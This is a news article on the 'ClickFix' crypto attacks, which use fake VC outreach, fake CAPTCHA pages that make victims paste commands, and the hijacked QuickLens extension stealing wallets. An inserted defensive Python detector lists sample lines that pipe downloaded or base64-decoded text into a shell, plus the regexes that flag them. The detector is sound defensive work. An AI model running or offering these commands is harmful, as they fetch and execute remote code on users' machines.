ClickFix Crypto Attack Escalates: Hackers Impersonate VCs, Lure Targets to Fake Meeting Links, and Hijack QuickLens Browser Extension to Steal Wallets

GateNews

On March 3rd, cybersecurity researchers disclosed that a cryptocurrency attack method called “ClickFix” is rapidly evolving. Recently, hackers have been disguising themselves as venture capital firms to contact target users on social media platforms and hijacking devices through malicious browser extensions to steal crypto wallet data and account information.

Cybersecurity organization Moonlock Lab released a report stating that attackers created multiple fake investment firm identities, including SolidBit, MegaBit, and Lumax Capital, and sent collaboration invitations to crypto industry professionals via LinkedIn. Once victims accept the communication, hackers provide a so-called online meeting link, usually disguised as Zoom or Google Meet.

When users click these links, they are directed to a fake verification page containing an “I’m not a robot” CAPTCHA styled like Cloudflare’s. Clicking it automatically copies malicious commands to the user’s clipboard, and the page prompts the user to paste a so-called verification code into their computer terminal. Executing these commands runs malicious programs on the device, which completes the ClickFix attack.

Moonlock Lab pointed out that the danger of this attack method lies in its use of social engineering to induce users to actively execute malicious code, bypassing traditional security defenses. Because there are no obvious malicious downloads or exploit behaviors, many security systems find it difficult to detect the risk in time.
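The paste-and-run step described above can still be checked on the defender's side, for example by triaging a command before it is run or when it appears in shell history. The following is an added example, not code from Moonlock Lab or the original article; the command shapes, the `triage` and `scan` helpers, and the sample lines are assumptions constructed for illustration, since the report's actual commands are not given here.

```python
import re

# Heuristic rules. The article does not publish the pasted commands, so these
# shapes (remote content or an encoded blob handed straight to an interpreter)
# are assumptions chosen for illustration.
EXEC_RULES = {
    "download piped to shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I),
    "decoded blob piped to shell": re.compile(
        r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I),
    "shell run on downloaded text": re.compile(
        r"\b(ba|z|da)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b", re.I),
    "PowerShell encoded command": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s", re.I),
}
# A trailing comment dressed up as a "verification code" is the social-engineering tell.
LURE = re.compile(r"#.*\b(verif\w*|captcha|robot|human)\b", re.I)

def triage(command):
    """Return (severity, matched_rule_names) for one pasted or logged command."""
    hits = [name for name, rx in EXEC_RULES.items() if rx.search(command)]
    if not hits:
        return "ok", hits  # lure wording alone is not treated as execution
    return ("high" if LURE.search(command) else "review"), hits

# Constructed sample lines (not taken from the report); example.invalid is reserved.
SAMPLES = [
    "curl -fsSL https://meet.example.invalid/verify | bash  # I'm not a robot: verification ID 48213",
    "echo QUJDRA== | base64 -d | sh",
    'bash -c "$(curl -fsSL https://meet.example.invalid/fix)"',
    "curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz",
    "git commit -m 'fix captcha verification test'  # human review done",
]

def scan(lines):
    """Triage every line and keep only those needing attention."""
    return [(sev, hits, line) for line in lines
            for sev, hits in [triage(line)] if sev != "ok"]

if __name__ == "__main__":
    for sev, hits, line in scan(SAMPLES):
        print(f"[{sev}] {', '.join(hits)} :: {line}")
```

The rules are deliberately narrow: a plain download to a file and a commit message that merely mentions "captcha" both pass, while any command that hands fetched or decoded text directly to an interpreter is held for review.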

Investigations revealed that an account named Mykhailo Hureiev had contacted multiple users as a co-founder of SolidBit Capital and is considered one of the early scam contacts. However, researchers noted that this attack activity is highly modular; once an identity is exposed, the attacker quickly switches to new fake identities to continue operations.

Meanwhile, hackers also expand their attack scope by hijacking browser extensions. John Tuckner, founder of security firm Annex Security, stated in the report that a Chrome extension called QuickLens was recently found to contain malicious scripts and was removed from the app store. Originally, this plugin allowed users to search with Google Lens within their browser, but after a developer change on February 1st, a new version containing malicious code was released within two weeks.

The report states that this extension has about 7,000 users and that its malicious code scans devices for crypto wallet data, seed phrases, and other sensitive information. Additionally, the malicious scripts can read Gmail emails, YouTube account data, and login or payment information from web forms.

Security researchers pointed out that the ClickFix attack has been spreading since 2024 and has affected multiple sectors, including manufacturing, retail, public utilities, and energy industries. As attackers continue to refine their social engineering tactics, the risk of wallet theft targeting crypto asset users is also significantly increasing.

GateUser-71bf4ddavip
· 6h ago
👍🙏🏻